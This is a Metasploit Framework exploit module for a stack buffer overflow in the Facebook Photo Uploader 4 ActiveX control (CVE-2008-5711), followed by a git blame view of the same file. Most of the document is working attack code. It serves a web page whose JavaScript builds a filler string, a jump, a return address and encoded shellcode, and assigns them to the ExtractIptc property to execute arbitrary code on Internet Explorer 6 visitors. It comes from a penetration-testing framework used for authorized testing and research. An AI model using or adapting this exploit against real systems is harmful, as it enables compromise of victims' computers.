metasploit-framework/modules/exploits/windows/browser/facebook_extractiptc.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Facebook Photo Uploader 4 ActiveX Control Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Facebook Photo Uploader 4.
				By sending an overly long string to the "ExtractIptc()" property located
				in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute
				arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'MC' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2008-5711' ],
					[ 'OSVDB', '41073' ],
					[ 'BID', '27534' ],
					[ 'URL', 'http://milw0rm.com/exploits/5049' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'         => 800,
					'BadChars'      => "\x00\x09\x0a\x0d'\\",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'IE 6 SP0-SP2 / Windows XP SP2 Pro English',     { 'Ret' => 0x74c9de3e } ], # 02/07/08
				],									               # ./msfpescan -i /tmp/oleacc.dll | grep SEHandler
			'DisclosureDate' => 'Jan 31 2008',
			'DefaultTarget'  => 0))
	end

	def autofilter
			false
	end

	def check_dependencies
			use_zlib
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Randomize some things
		vname	  = rand_text_alpha(rand(100) + 1)
		strname = rand_text_alpha(rand(100) + 1)
		rand1   = rand_text_alpha(rand(100) + 1)
		rand2   = rand_text_alpha(rand(100) + 1)
		rand3   = rand_text_alpha(rand(100) + 1)
		rand4   = rand_text_alpha(rand(100) + 1)

		# Set the exploit buffer
		filler  = Rex::Text.to_unescape(rand_text_alpha(2))
		jmp     = Rex::Text.to_unescape([0x969606eb].pack('V'))
		ret     = Rex::Text.to_unescape([target.ret].pack('V'))
		sc      = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Build out the message
		content = %Q|<html>
<object classid='clsid:5C6698D9-7BE4-4122-8EC5-291D84DBD4A0' id='#{vname}'></object>
<script language='javascript'>
#{rand1} = unescape('#{filler}');
while (#{rand1}.length <= 261) #{rand1} = #{rand1} + unescape('#{filler}');
#{rand2} = unescape('#{jmp}');
#{rand3} = unescape('#{ret}');
#{rand4} = unescape('#{sc}');
#{strname} = #{rand1} + #{rand2} + #{rand3} + #{rand4};
#{vname}.ExtractIptc = #{strname};
</script>
</html>
|

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00			`##`
Importing two new wireless DoS modules, setting svn:keywords flags where needed. git-svn-id: file:///home/svn/framework3/trunk@5482 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-21 05:27:06 +00:00			`# $Id$`
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00			`##`

			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! git-svn-id: file:///home/svn/framework3/trunk@7724 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 05:50:37 +00:00			`Rank = NormalRanking`
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpServer::HTML`
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Facebook Photo Uploader 4 ActiveX Control Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! git-svn-id: file:///home/svn/framework3/trunk@9262 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in Facebook Photo Uploader 4.`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`By sending an overly long string to the "ExtractIptc()" property located`
			`in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute`
			`arbitrary code.`
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00			`},`
			`'License' => MSF_LICENSE,`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`'Author' => [ 'MC' ],`
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00			`'Version' => '$Revision$',`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`'References' =>`
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00			`[`
Massive OSVDB reference update from Steve Tornio. git-svn-id: file:///home/svn/framework3/trunk@6629 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-07 20:20:42 +00:00			`[ 'CVE', '2008-5711' ],`
			`[ 'OSVDB', '41073' ],`
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00			`[ 'BID', '27534' ],`
			`[ 'URL', 'http://milw0rm.com/exploits/5049' ],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 800,`
			`'BadChars' => "\x00\x09\x0a\x0d'\\",`
fix PrepenEncoder typo, replace it with 'StackAdjustment' => -3500 git-svn-id: file:///home/svn/framework3/trunk@5613 4d416f70-5f16-0410-b530-b9f4589650da 2008-08-01 20:04:42 +00:00			`'StackAdjustment' => -3500,`
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`[ 'IE 6 SP0-SP2 / Windows XP SP2 Pro English', { 'Ret' => 0x74c9de3e } ], # 02/07/08`
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00			`], # ./msfpescan -i /tmp/oleacc.dll \| grep SEHandler`
reverting the disclosure dates for now need to clean up the patch git-svn-id: file:///home/svn/framework3/trunk@12540 4d416f70-5f16-0410-b530-b9f4589650da 2011-05-04 20:43:19 +00:00			`'DisclosureDate' => 'Jan 31 2008',`
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00			`'DefaultTarget' => 0))`
			`end`

			`def autofilter`
			`false`
			`end`

			`def check_dependencies`
			`use_zlib`
			`end`

			`def on_request_uri(cli, request)`
			`# Re-generate the payload`
			`return if ((p = regenerate_payload(cli)) == nil)`

			`# Randomize some things`
			`vname = rand_text_alpha(rand(100) + 1)`
			`strname = rand_text_alpha(rand(100) + 1)`
			`rand1 = rand_text_alpha(rand(100) + 1)`
			`rand2 = rand_text_alpha(rand(100) + 1)`
			`rand3 = rand_text_alpha(rand(100) + 1)`
			`rand4 = rand_text_alpha(rand(100) + 1)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00			`# Set the exploit buffer`
			`filler = Rex::Text.to_unescape(rand_text_alpha(2))`
			`jmp = Rex::Text.to_unescape([0x969606eb].pack('V'))`
			`ret = Rex::Text.to_unescape([target.ret].pack('V'))`
			`sc = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))`

			`# Build out the message`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`content = %Q\|<html>`
			`<object classid='clsid:5C6698D9-7BE4-4122-8EC5-291D84DBD4A0' id='#{vname}'></object>`
			`<script language='javascript'>`
			`#{rand1} = unescape('#{filler}');`
			`while (#{rand1}.length <= 261) #{rand1} = #{rand1} + unescape('#{filler}');`
			`#{rand2} = unescape('#{jmp}');`
			`#{rand3} = unescape('#{ret}');`
			`#{rand4} = unescape('#{sc}');`
			`#{strname} = #{rand1} + #{rand2} + #{rand3} + #{rand4};`
			`#{vname}.ExtractIptc = #{strname};`
			`</script>`
			`</html>`
			`\|`

added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00			`print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")`

			`# Transmit the response to the client`
			`send_response_html(cli, content)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
added exploit modules wincomlpd_admin.rb and facebook_extractiptc.rb. git-svn-id: file:///home/svn/framework3/trunk@5399 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-07 23:08:14 +00:00			`# Handle the payload`
			`handler(cli)`
			`end`

Massive OSVDB reference update from Steve Tornio. git-svn-id: file:///home/svn/framework3/trunk@6629 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-07 20:20:42 +00:00			`end`